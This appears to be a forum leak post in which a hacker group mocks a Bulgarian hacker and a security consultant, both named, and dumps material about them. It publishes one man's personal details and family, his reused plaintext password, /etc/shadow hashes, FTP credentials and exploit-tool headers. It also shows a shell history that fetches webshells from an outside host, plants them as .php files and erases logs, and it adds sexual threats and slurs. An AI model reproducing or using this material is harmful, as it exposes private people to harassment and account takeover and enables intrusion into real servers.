Welcome to official forums on FreeUniBG @ Network

LOL > SlaserX < LOL
LOL > Pirate-Sky < LOL
LOL > SecurityGuy < LOL

* LOL * SlaserX * LOL *

SlaserX is a well-known criminal and wannabe hacker from Bulgaria. He's been around for quite some time now. A few weeks ago the miserable idiot and his fellow minions got finally busted and the misguided cops mistakenly claimed to have arrested the most powerful hacker group in Bulgaria[1]. Wait, what?!

Cops, Y U so unbelievably stupid? You're nothing but miserable media whores. We've been fucking around with these kids and we certainly know how 1337 they are. We've got their passwords, we've been reading through their mail spools, we've been laughing at their hacking attempts and yet, you call them the most powerful hacker group. Yes, some of the most talented hackers worldwide are actually based in Eastern Europe, but you silly bitches won't ever hear about them. Suck on my hard cock and and die, brainless cunts! How the fuck can you even be so stupid and lame?

Take a seat, enjoy this leak and remember.. this is absolutely nothing compared to what we've done to you, idiots.

[1] http://press.mvr.bg/en/News/news120704_08.htm

>> So, who's this guy?

First Name: Ivan
Last Name: Bachvarov
Nickname: SlaSerX
Birthday: 21.07.1986
Height: 1.76cm
Father: Jecho Bachvarov
Sister: Mariana Bachvarova
Girlfriend: Mihaela Mandalcheva
Location: Burgas, Bulgaria

>> Let's take a look at what his passwords look like.

vbox7.com (slaserx:1986125),
hit.bg (slaserx:1986125),
theunkn0wn.org (slaserx:1986125),
kaldata.com (slaserx:1986125),
bghelp.bg (slaserx:1986125),
etc.

>> Yes, password reusage is so typical for these idiots. You still call yourself a hacker? Here are some of his already owned mail boxes.

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

>> Guess how 1337 his passwords were? ;) Now let's take a look at some of his boxes.

root@bgdns:/root# uname -a
Linux bgdns 2.6.32-5-686 #1 SMP Wed Jan 12 04:01:41 UTC 2011 i686 GNU/Linux

root@bgdns:/root# w
23:15:45 up 6:26, 2 users, load average: 0.08, 0.09, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 office 16:51 6:23m 0.42s 0.42s -bash
root pts/1 office 17:37 5:17m 0.34s 0.34s -bash

root@bgdns:/root# cat /etc/shadow
root:$6$OeWqv5cY$zN9ZVm79q0KLjbsWI.HG0MMlUPiv6c2PrOtYwHJt1UFtcgXwhIgY63u0ZQuMXnWlUN4rKCDbf9Qb7jwC.Bdpp.:15024:0:99999:7:::
daemon:*:15024:0:99999:7:::
bin:*:15024:0:99999:7:::
sys:*:15024:0:99999:7:::
sync:*:15024:0:99999:7:::
games:*:15024:0:99999:7:::
man:*:15024:0:99999:7:::
lp:*:15024:0:99999:7:::
mail:*:15024:0:99999:7:::
news:*:15024:0:99999:7:::
uucp:*:15024:0:99999:7:::
proxy:*:15024:0:99999:7:::
www-data:*:15024:0:99999:7:::
backup:*:15024:0:99999:7:::
list:*:15024:0:99999:7:::
irc:*:15024:0:99999:7:::
gnats:*:15024:0:99999:7:::
nobody:*:15024:0:99999:7:::
libuuid:!:15024:0:99999:7:::
Debian-exim:!:15024:0:99999:7:::
statd:*:15024:0:99999:7:::
sshd:*:15024:0:99999:7:::
slaserx:$6$XW1z1pT4$h/y7KaZRtOjijhnQLV4nIeBwMggaX/WwPTCVEUasRnUwKMIs1NVA70/4EwE/wDQTsH/xgzYQeEgtaiP3NtEkx1:15031:0:99999:7:::
postfix:*:15024:0:99999:7:::
mysql:!:15024:0:99999:7:::
bind:*:15024:0:99999:7:::
polw:!:15024:0:99999:7:::
postgrey:*:15024:0:99999:7:::
proftpd:!:15024:0:99999:7:::
ftp:*:15024:0:99999:7:::
vmail:!:15024:0:99999:7:::
vu2000:!:15024:0:99999:7:::
vu2001:!:15024:0:99999:7:::
vu2002:!:15024:0:99999:7:::
vu2003:!:15024:0:99999:7:::
snmp:*:15025:0:99999:7:::
vu2004:!:15025:0:99999:7:::
vu2005:!:15031:0:99999:7:::
vu2006:!:15034:0:99999:7:::
vu2007:!:15034:0:99999:7:::
vu2008:!:15035:0:99999:7:::
messagebus:*:15038:0:99999:7:::
lbcd:*:15038:0:99999:7:::
vu2009:!:15039:0:99999:7:::

>> Ever wondered what the most powerful hacker tools look like? Well, take look..

root@bgdns:/root# head -25 l33t/a.pl
#!/usr/bin/perl

use IO::Socket;

print q{
#######################################################################
# vBulletin. Version 4.0.1 Remote SQL Injection Exploit #
# By indoushka #
# www.iq-ty.com/vb #
# Souk Naamane (00213771818860) #
# Algeria Hackerz ([email protected]) #
# Dork: Powered by vBulletin. Version 4.0.1 #
#######################################################################
};

if (!$ARGV[2]) {

print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid

perl VB4.0.1.pl www.vb.com /forum/ 1

};

root@bgdns:/root# head -5 l33t/gen
#!/usr/bin/perl
##
### bren.pl . Generate every character combination for 15 characters in length(ughh.)
##
#

root@bgdns:/root# head -30 l33t/t.pl
#!/usr/bin/perl

use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT]

[File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#
- : File Of password list (list.txt) #
  # [File] : file for save password (password.txt) #
  # #
  ###############################################################
  # (c)oded By Hessam-x / simorgh-ev.com #
  ###############################################################
  );exit;}
  
  root@bgdns:/root# tar tvf tools.tar
  drwxr-xr-x root/root 0 2011-02-11 11:14 tools/
  -rwxr-xr-x root/root 904 2011-01-15 18:18 tools/stop.flood
  -rwxr-xr-x root/root 700 2011-01-15 18:21 tools/monitor
  -rw-r--r-- slaserx/slaserx 1800 2011-02-11 11:11 tools/shells.zip
  -rwxr-xr-x root/root 1853 2011-02-07 18:30 tools/check.ssh
  drwxr-xr-x root/root 0 2011-01-16 19:45 tools/sms/
  -rwxr-xr-x root/root 1360 2011-01-16 19:26 tools/sms/212.70.159.86
  -rwxr-xr-x root/root 1332 2011-01-16 19:41 tools/sms/212.70.159.82-m
  -rwxr-xr-x root/root 1326 2011-01-16 19:42 tools/sms/212.70.159.86-m
  -rwxr-xr-x root/root 1271 2011-01-16 19:30 tools/sms/7.7.7.7
  -rwxr-xr-x root/root 1331 2011-01-16 19:43 tools/sms/212.70.159.87-m
  -rwxr-xr-x root/root 630 2011-01-19 09:47 tools/sms/run
  -rwxr-xr-x root/root 1333 2011-01-16 19:42 tools/sms/212.70.159.83-m
  -rwxr-xr-x root/root 1365 2011-01-16 19:27 tools/sms/212.70.159.87
  -rwxr-xr-x root/root 1367 2011-01-16 18:50 tools/sms/212.70.159.83
  -rwxr-xr-x root/root 1366 2011-01-16 18:49 tools/sms/212.70.159.82
  -rwxr-xr-x root/root 1332 2011-01-16 19:40 tools/sms/94.156.142.99-m
  -rwxr-xr-x root/root 1366 2011-01-16 18:45 tools/sms/94.156.142.99
  -rwxr-xr-x root/root 528 2011-01-15 18:20 tools/unban
  -rwxr-xr-x root/root 526 2011-01-15 18:19 tools/ban
  -rwxr-xr-x root/root 136 2011-01-15 18:36 tools/grep.404
  -rwxr-xr-x root/root 468 2011-01-15 18:35 tools/logged
  -rwxr-xr-x root/root 302 2011-01-15 18:22 tools/dellog
  -rw-r--r-- root/root 14 2011-02-07 18:30 tools/bannedips.txt
  drwxr-xr-x root/root 0 2011-02-11 14:38 tools/shells/
  -rwxr-xr-x root/root 143 2010-07-16 13:41 tools/shells/find.r57
  -rwxr-xr-x root/root 12 2010-07-16 13:45 tools/shells/a
  -rwxr-xr-x root/root 144 2010-07-16 13:56 tools/shells/find.eval
  -rwxr-xr-x root/root 178 2010-07-16 14:35 tools/shells/find.shell
  -rwxr-xr-x root/root 144 2010-07-16 13:45 tools/shells/find.rt13
  -rwxr-xr-x root/root 153 2010-07-16 13:49 tools/shells/find.decode
  -rwxr-xr-x root/root 34461 2011-02-11 14:40 tools/shells/scan.txt
  -rwxr-xr-x root/root 143 2010-06-30 14:57 tools/shells/find.c99
  drwxr-xr-x root/root 0 2011-02-04 20:46 tools/backup/
  -rwxr-xr-x root/root 641 2011-02-04 20:44 tools/backup/backup-rsbg
  -rwxr-xr-x root/root 657 2011-02-04 20:45 tools/backup/backup-slaserx
  -rwxr-xr-x root/root 271 2011-02-07 11:23 tools/backup/run
  -rwxr-xr-x root/root 650 2011-02-04 20:41 tools/backup/backup-psc
  
  root@bgdns:/root# tar tzvf t.tar.gz
  drwxr-xr-x root/root 0 2011-03-01 20:20 l33t/
  -rwxr-xr-x root/root 2358 2011-02-28 17:26 l33t/a.pl
  -rwxr-xr-x root/root 961923 2011-02-27 01:31 l33t/list.txt
  -rwxr-xr-x root/root 18883 2010-12-20 01:09 l33t/slowloris.pl
  -rwxr-xr-x root/root 156 2011-03-01 18:17 l33t/test.txt
  -rwxrwxrwx root/root 11 2011-02-28 17:26 l33t/a
  -rwx--x--x root/root 66502 2011-02-27 06:46 l33t/list.txt.save
  -rw-r--r-- root/root 20056 2011-03-01 20:21 l33t/ssh2ftpcrack.tar.bz2
  -rwxr-xr-x root/root 2109 2011-02-27 00:51 l33t/t.pl
  -rwxr-xr-x root/root 6359 2011-02-27 00:52 l33t/gen
  
  root@bgdns:/root# cat .bash_alias
  # some more ls aliases
  alias less='less -SR'
  alias l='ls -lLBhX --time-style=locale'
  alias la='ls -la $1 | less'
  alias ll='ls -lX'
  alias lx='ls -lXB' #sort by ext
  alias lk='ls -lSr' #soft by size
  
  # Alias's to modifed commands
  alias ps='ps auxf'
  alias home='cd ~'
  alias pg='ps aux | grep' #requires an argument
  alias lg='ls -la | grep' #requires an argument
  alias un='tar -zxvf'
  alias df='df -hT'
  alias ping='ping -c 10'
  #alias net-restart='sudo /etc/init.d/networking restart'
  #alias windir="cd '/home/hkvn/.wine/drive_c/Program Files'"
  alias ..='cd ..'
  alias update='sudo apt-get update'
  alias upgrade='sudo apt-get upgrade'
  alias install='sudo apt-get install'
  alias remove='sudo apt-get remove'
  #alias eclipse='eclipse -vmargs -Xmx512M'
  #alias firefox='firefox-3.5'
  alias ipconfig='ifconfig -a'
  
  #My alias
  alias flood='netstat'
  alias stop='/root/tools/stop.flood'
  alias ban='/root/tools/ban.pl'
  alias unban='/root/tools/unban.pl'
  alias monitor='/root/tools/monitor.sh'
  alias cron='env EDITOR=nano crontab -e'
  alias editcfg='pico /var/www/ispcp/gui/index.php'
  alias arest='/etc/init.d/apache2 restart'
  alias cls='clear'
  alias q='exit'
  # Some ssh connections
  alias shell='ssh -l slaserx slaserx.ath.cx'
  #alias xalo='sudo vpnc-connect xalo.conf'
  
  # Some ping commands
  #alias pga='ping 192.168.1.1 -c 10'
  #alias pgo='ping google.com -c 10'
  #alias phk='ping hkvn.info -c 10'
  #alias pch='ping chuyenhungyen.org -c 10'
  
  #Some chmod commands
  alias mx='chmod a+x'
  alias 000='chmod 000'
  alias 644='chmod 644'
  alias 755='chmod 755'
  
  # cat .bash_history
  clear
  nmap localhost
  exit
  host perfektno.com
  w
  iptables -L |grep 77.78.36.40
  ban 77.78.36.40
  pico /etc/init.d/firewall
  ls -a
  iptables -L
  clear
  search metaspolit
  search metasploit
  search icmp rate
  pico /etc/init.d/firewall
  iptables -L
  stop
  flood
  clear
  exit
  pico /etc/networks
  pico /etc/network/interfaces
  exit
  host cs-adrenalines.info
  host 79.124.67.194
  stop
  flood
  cat /var/log/fail2ban.log
  cat /var/log/psad/fw_check
  cat /var/log/psad/top_attackers
  clear
  clear
  stop
  exit
  cd l33t/
  wget https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  ls -a
  wget
  wget --help
  wget --help |grep ssl
  wget --no-check-certificate https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  tar -jxvf nikto-2.1.4.tar.bz2
  cd nikto-2.1.4/
  ls -a
  ./nikto.pl
  ./nikto.pl -host abv.bg -root
  ./nikto.pl -host abv.bg -root+
  ./nikto.pl -host abv.bg
  ./nikto.pl
  ./nikto.pl -host
  ./nikto.pl -host pweb.co.cc
  w
  last
  flood
  stop
  apachectl restart
  stop
  apachectl restart
  cd /root/tools/
  ./dellog
  cat /var/log/apache2/pirate-sky.info-combined.log
  cat /var/log/apache2/pirate-sky.info-combined.log
  cat /var/log/apache2/pirate-sky.info-combined.log
  iptables -L
  host eco.gov.kz
  cat /var/log/apache2/pirate-sky.info-combined.log
  apachectl restart
  apachectl restart
  ls -a
  cron
  cron
  /etc/init.d/cron restart
  cd /var/www/virtual/warez-database.org/htdocs/
  ls -a
  cd hooks/
  ls -a
  cd ..
  ls -a
  cd converge_local/
  ls -a
  ls -a
  ls -a
  wget xpls.hit.bg/shell/shell.gif
  rm -rf shell.gif
  wget xpls.hit.bg/shell/linuxbg.shell
  wget xpls.hit.bg/shell/linuxbg.gif
  rm -rf linuxbg.*
  ls -a
  ls -a
  mv /home/slaserx/faq.php ./
  ls -a
  rm -rf .htaccess
  ls -a
  rm -rf faq.php
  /
  cd /
  pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  clear
  whois privatecrew.net
  whois privatecrew.net
  whois bgdns.info
  host freebsd.bg
  clear
  genpasswd
  clear
  genpasswd
  genpasswd
  genpasswd
  ls -a
  cd /var/www/virtual/privatecrew.net/htdocs/
  ls -s
  ls -a
  rm -rf *
  ls -a
  ls -a
  cd ..
  cp ../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  ls -a
  cat ../pirate-sky.info/htdocs/conf_global.php
  ls -a
  cp pirate-sky.info-backup-2011.03.06-000737.tar.bz2 backups/
  clear
  ls -a
  rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  rm -rf backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  genpasswd
  genpasswd
  genpasswd
  ls -a
  cd htdocs/
  ls -a
  pico /etc/init.d/firewall
  cat /etc/init.d/firewall
  iptables -t filter -A INPUT -s 95.42.32.36 -j ACCEPT
  pico /etc/init.d/firewall
  /etc/init.d/firewall
  flood
  stop
  ls -a
  iptables -L |grep 94.156.142.66
  iptables -L |grep lucifer
  stop
  iptables -L |grep 95.42.32.36
  iptables -L
  cd /var/www/fcgi/
  ls -a
  pico warez-database.org/php5/php.ini
  pico privatecrew.net/php5/php.ini
  pico privatecrew.net/php5/php.ini
  apachectl restart
  pico privatecrew.net/php5/php.ini
  apachectl restart
  ls -a
  pico pirate-sky.com/php5/php.ini
  pico privatecrew.net/php5/php.ini
  apachectl restart
  cd /root/tools/
  ls -a
  cd shells/
  pico new.p
  pico new
  ls -a
  ./a
  ls -a
  pico find.r57
  pico new
  ./find.
  ./new
  ls -a
  ls -a
  cd /var/www/virtual/
  ls -a
  cd privatecrew.net/htdocs/
  cd /root/tools/
  cd shells/
  ./new
  ls -a
  pico new
  pico find.eval
  ls -a
  pico new
  pico new
  ./new
  ls -a
  pico new
  ls -a
  ./new
  ls -a
  pico new
  ls -a
  ./new
  pico new
  ./new
  ls -a
  rm -rf new
  pico find.shell
  cat scan.txt
  pico scan.txt
  rm -rf scan.txt
  ls -a
  ./find.shell
  ls -a
  cat scan.txt
  ls -a
  rm -rf scan.txt
  cat sc
  ls -a
  pico find.shell
  pico find.shell
  ./find.shell
  cat scan.txt
  rm -rf scan.txt
  ls -a
  ./find.shell
  cat scan.txt
  cat scan.txt |grep faq.php
  ls -a
  rm -rf scan.txt
  pico /var/www/virtual/privatecrew.net/htdocs/faq.php
  pico find.shell
  ls -a
  ./find.
  ./find.shell
  cat scan.txt
  ls -a
  clear
  cd /var/www/virtual/
  ls -a
  cd privatecrew.net/
  ls -a
  cd htdocs/
  cd 0893552070/
  ls -a
  wget http://xpls.hit.bg/shell/c99.gif
  wget http://xpls.hit.bg/shell/devil.gif
  wget http://xpls.hit.bg/shell/linux.gif
  ls -a
  mv linux.gif linux.php
  ls -a
  mv devil.gif devil.php
  mv c99.gif c99.php
  ls -a
  wget http://xpls.hit.bg/shell/shell.gif
  mv shell.gif shell.php
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  cp linux.php /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/
  rm -rf /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/linux.php
  ls -a
  ls -a
  ls -a
  clear
  ls -a
  cd ..
  rm -rf 0893552070/
  ls -a
  exit
  ls -a
  ls -a
  cd /var/www/virtual/pirate-sky.
  cd /var/www/virtual/privatecrew.net/htdocs/
  ls -a
  cd a
  ls -a
  cd asd/
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  rm crontab -l
  crontab -l
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  cd ..
  ls -a
  ls -a
  rm -rf admin/
  rm -rf cache/
  rm -rf con*
  ls -a
  rm -rf includes/
  ls -a
  ls -a
  rm -rf interface/
  rm -rf ips_kernel/
  ls -a
  rm -rf public/
  rm -rf starforum/
  ls -a
  rm -rf uploads/
  ls -a
  ls -a
  ls -a
  cd ..
  cd htdocs/
  cd ..
  cd backups/
  ls -a
  cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  ls -a
  pico /etc/crontab
  ls -a
  cd ..
  ls -a
  cd htdocs/
  ls -a
  cd ..
  cd backups/
  rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  cd ..
  cd htdocs/
  cd pp/
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  host mikrotik-bg.net
  host 195.191.149.89
  cat /var/log/cron.log
  ls -a
  crontab -l
  cron
  /etc/init.d/cron restart
  /etc/init.d/cron status
  ls -a
  ls -a
  cat /var/log/cron.log
  cat /var/log/cron.log |grep err
  clear
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  cat /var/log/cron.log
  ls -a
  ls -a
  crontab -l
  ls -a
  ls -a
  cat /var/log/cron.log
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls
  ls
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -la
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  cat /var/log/cron.log
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  wget xpls.hit.bg/shell.gif
  wget xpls.hit.bg/linux.gif
  mv linux.gif linux.php
  mv shell.gif shell.php
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  rm -rf /tmp/scan.txt
  ls -a
  ls -a
  ls -la
  ls -a
  ls -a
  ls -a
  pico linux.php
  ls -a
  rm -rf linux.php
  rm -rf shell.php
  ls -a
  ls -a
  wget xpls.hit.bg/shell/shell.gif
  wget xpls.hit.bg/shell/linux.gif
  mv linux.gif linux.php
  mv shell.gif shell.php
  pico shell.php
  ls -a
  pico shell.php
  ls -a
  wget xpls.hit.bg/shell/shell.gif
  mv linux.gif linux.php
  wget xpls.hit.bg/shell/linux.gif
  ls -a
  mv linux.gif linux.php
  mv shell.gif shell.php
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  cat /tmp/scan.txt
  ls -a
  ls -a
  ls -a
  ls -a
  cat /var/log/cron.log
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  ls -a
  cd ..
  cd ..
  cd ..
  cd ..
  exit
  cd /var/www/virtual/
  ls -a
  cd linuxbg.info/
  cd backups/
  ls -a
  rm -rf t3es_vb.sql.bz2
  ls -a
  rm -rf t3es_soze.sql.bz2
  ls -a
  whois cms-bg.com
  whois jump.bg
  stop
  cat /tmp/scan.txt
  cat /var/log/apache2/other_vhosts_access.log
  cat /var/log/apache2/default-error.log
  clear
  cat /var/log/apache2/default-error.log
  clear
  cat /var/log/apache2/default-error.log
  cat /var/log/apache2/default-error.log
  cat /var/log/apache2/default-error.log
  clear
  clear
  clear
  exit
  os -a
  pico /etc/init.d/firewall
  ping abv.bg
  ls -a
  exit
  
  root@bgdns:/root/tools/backup# cat backup-psc
  #!/bin/sh
  #Created by SlaSerX
  #red='1;31m'
  TARGET_EMAIL="[email protected]"
  
  # local directory to pickup *.tar.gz file
  
  tar zcvf /backup/psc/pirate-sky.$(date +%s).$(date +"%d-%m-%Y").tgz /var/www/virtual/pirate-sky.com/backups/
  
  # ftp remote connections
  
  FTPU="backup" # ftp login name
  FTPP="1986125" # ftp password
  FTPS="85.217.204.199" # remote ftp server
  FTPF="/home/backup/psc/" # remote ftp server directory for $FTPU & $FTPP
  LOCALD="/backup/psc/*.tgz"
  ncftpput -m -u $FTPU -p $FTPP $FTPS $FTPF $LOCALD
  
  echo
  echo -e " \e[${red} Upload psc Backup \e[m"
  echo 'pirate-sky' | mail -s "Backup Uploaded:" $TARGET_EMAIL
  echo
  
  root@bgdns:/root/tools# head -10 check.ssh
  #!/usr/bin/perl
  ##############################################################################
  # By BumbleBeeWare.com 2006
  # SSH Log Checker
  # sshlogcheck.cgi
  # reads ssh log and blocks hacking attempts using ip tables
  ##############################################################################
  # CONFIGURE
  ##############################################################################
  
  root@bgdns:/root/tools# cat dellog
  #!/bin/bash
  #Created by SlaSerX
  red='1;31m'
  /bin/rm -rf /var/log/apache2/*.log
  /bin/rm -rf /var/log/apache2/*.log.*
  /bin/rm -rf /var/log/apache2/users/*.log
  /bin/rm -rf /var/log/apache2/users/*.log.*
  /etc/init.d/apache2 restart
  echo -e " \e[${red} Apache logs Erase. Apache has been restarted\e[m"
  
  root@bgdns:/root/tools# cat grep.404
  grep "404" /var/log/apache2/users/pirate-sky.com-access.log | grep "`date +%d/%b/%Y`" | mailx -s 'SUBJECT GOES HERE' '[email protected]'
  
  >> Refer to the URL at the end of the file for some more fun.
  
  * LOL * Pirate-Sky * LOL *
  
  Lamez.org, Pirate-Sky, World Warez Crew, CyberWarrior Invasion Group, etc. are all the same bitches and idiots again and again. They've been continuously renaming their own groups due to all kind of spectacular fails during the years. These are basically brainless infants playing with SQLmap and defacing outdated and improperly configured CMSs.
  
  You can clearly see how randomly they choose their targets -
  http://www.zone-h.org/archive/notifier= ... 20Invasion
  
  >> Check the aforementioned URL for their databases. ;)
  
  * LOL * SecurityGuy * LOL *
  
  Alexander Sverdlov a.k.a. the SecurityGuy is one of those pseudo-security whores that you'd like to publicly rape. This information security illiterate has been making money through consultancy and training services for ages. Giving your money to this miserable monkey will eventually boost your false sense of security, but nothing more or less. Beware of who you're entrusting your security decisions. Really.
  
  >> Let's just briefly review what's this bitch up to.
  
  [email protected] [/home/nopasara/public_html/securityguy]# uname -a
  Linux hera.superhosting.bg 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
  
  [email protected] [/home/nopasara/public_html/securityguy]# id
  uid=32684(nopasara) gid=32686(nopasara) groups=32686(nopasara)
  
  [email protected] [/home/nopasara]# ls -lia
  total 28108
  35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ./
  2 drwx--x--x 660 root root 20480 Mar 19 16:50 ../
  35897557 -rw------- 1 nopasara nopasara 3048 Jan 18 2010 .bash_history
  35897347 -rw-r--r-- 1 nopasara nopasara 33 Dec 10 2008 .bash_logout
  35897346 -rw-r--r-- 1 nopasara nopasara 176 Dec 10 2008 .bash_profile
  35897348 -rw-r--r-- 1 nopasara nopasara 124 Dec 10 2008 .bashrc
  35897357 -rw------- 1 nopasara nopasara 17 Dec 10 2008 .contactemail
  35897376 drwx------ 5 nopasara nopasara 4096 Mar 4 11:07 .cpanel/
  35897878 -rw------- 1 nopasara nopasara 15 Dec 31 2008 .cpanel-logs
  35897520 -rw-r--r-- 1 nopasara nopasara 6 Mar 20 02:45 .dns
  35897450 drwxr-x--- 7 nopasara nopasara 4096 Feb 25 2010 .fantasticodata/
  35897436 -rw------- 1 nopasara nopasara 17 Feb 18 01:53 .ftpquota
  35897353 drwxr-x--- 3 nopasara nobody 4096 Jan 4 2009 .htpasswds/
  35897354 -rw------- 1 nopasara nopasara 12 Mar 4 10:44 .lastlogin
  35897419 drwx------ 2 nopasara nopasara 4096 Dec 19 2008 .trash/
  35898508 -rw------- 1 nopasara nopasara 1808 Jan 18 2010 .viminfo
  35897374 lrwxrwxrwx 1 nopasara nopasara 34 Dec 10 2008 access-logs -> /usr/local/apache/domlogs/nopasara/
  35946500 drwxr-xr-x 2 nopasara nopasara 4096 Nov 25 15:44 backups/
  35897650 -rw-r----- 1 nopasara nopasara 1 Dec 27 2008 cpbackup-exclude.conf
  36209930 drwxr-xr-x 3 nopasara nopasara 4096 Jul 26 2009 default/
  35897906 drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 docs/
  35897349 drwxr-x--- 3 nopasara mail 4096 Feb 6 16:07 etc/
  36044801 drwx------ 2 nopasara nopasara 12288 Feb 28 15:20 logs/
  35897351 drwxrwx--- 7 nopasara nopasara 4096 Apr 21 2010 mail/
  35963400 drwxr-xr-x 2 nopasara nopasara 4096 Jan 16 2010 mysql/
  35898497 -rw-r--r-- 1 nopasara nopasara 4128921 Jan 10 2010 nopasara_blog.sql
  35897470 -rw-r--r-- 1 nopasara nopasara 723362 Feb 13 18:25 nopasara_emea.sql
  35897856 -rw-r--r-- 1 nopasara nopasara 38813 Feb 15 13:28 php.ini
  35932502 drwxr-xr-x 3 nopasara nopasara 4096 Jan 27 2010 procedures/
  35897355 drwxr-xr-x 3 nopasara nopasara 4096 Nov 6 2005 public_ftp/
  35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 public_html/
  35898505 -rw-r--r-- 1 nopasara nopasara 23699498 Jan 18 2010 sverdlov.sql
  35913892 drwxr-xr-x 2 nopasara nopasara 4096 May 20 2009 test/
  35897350 drwxr-xr-x 7 nopasara nopasara 4096 Mar 4 11:07 tmp/
  35897358 lrwxrwxrwx 1 nopasara nopasara 11 Dec 10 2008 www -> public_html/
  
  [email protected] [/home/nopasara/public_html]# ls -lia
  total 2286196
  35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ./
  35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ../
  35897364 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 .htaccess
  35967226 drwxr-xr-x 2 nopasara nopasara 4096 Jul 5 2009 _notes/
  35897444 drwxr-xr-x 6 nopasara nopasara 4096 Jan 16 15:28 bgsecrets.com/
  35947140 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 blog/
  35947141 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cdn/
  37601282 drwxr-xr-x 2 nopasara nopasara 4096 Oct 4 18:47 cgi-bin/
  35947142 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cmdb/
  35947139 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 crm/
  36129979 drwxr-xr-x 10 nopasara nopasara 4096 Jan 12 2010 demo/
  35930169 drwxr-xr-x 5 nopasara nopasara 4096 Mar 17 12:35 emeastudio/
  35947143 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 eye/
  35897426 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 index.php
  35980080 drwxr-xr-x 6 nopasara nopasara 4096 Jan 28 12:07 ioscompatible.com/
  35897530 -rw-r--r-- 1 nopasara nopasara 2338684928 Feb 28 01:23 nfs.iso
  37751973 drwxr-xr-x 3 nopasara nopasara 4096 Jan 6 21:24 png/
  36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 securityguy/
  35948620 drwxr-xr-x 5 nopasara nopasara 4096 Mar 5 01:53 studioburgas/
  36241410 drwxr-xr-x 8 nopasara nopasara 4096 Feb 6 15:19 sverdlov.net/
  35964452 drwxr-xr-x 2 nopasara nopasara 4096 Jan 30 23:07 test/
  35930404 drwxr-xr-x 5 nopasara nopasara 4096 Dec 29 21:25 topusahostingproviders.com/
  35914083 drwxr-xr-x 3 nopasara nopasara 4096 Jan 7 01:53 tragedyworld.com/
  35897467 drwxr-xr-x 6 nopasara nopasara 4096 Jan 6 21:25 web/
  36144507 drwxr-xr-x 11 nopasara nopasara 4096 Jul 5 2010 wo/
  
  [email protected] [/home/nopasara/public_html/securityguy]# ls -lia
  total 5722468
  36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 ./
  35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ../
  36094811 -rw------- 1 nopasara nopasara 16 Mar 7 01:54 .ftpquota
  36094012 -rw-r--r-- 1 nopasara nopasara 3987 Mar 2 01:23 .htaccess
  37093607 drwxr-xr-x 2 nopasara nopasara 4096 Jan 26 2010 cgi-bin/
  36094022 -rw-r--r-- 1 nopasara nopasara 1468465152 Nov 21 2009 dni.avi
  36094931 -rw-r--r-- 1 nopasara nopasara 397 Mar 2 01:21 index.php
  37322753 drwxr-xr-x 7 nopasara nopasara 4096 Nov 9 2009 leech/
  36094114 -rw-r--r-- 1 nopasara nopasara 15606 Mar 2 01:21 license.txt
  36094164 -rw-r--r-- 1 nopasara nopasara 210 Jan 7 02:58 php.ini
  36094115 -rw-r--r-- 1 nopasara nopasara 9200 Mar 2 01:21 readme.html
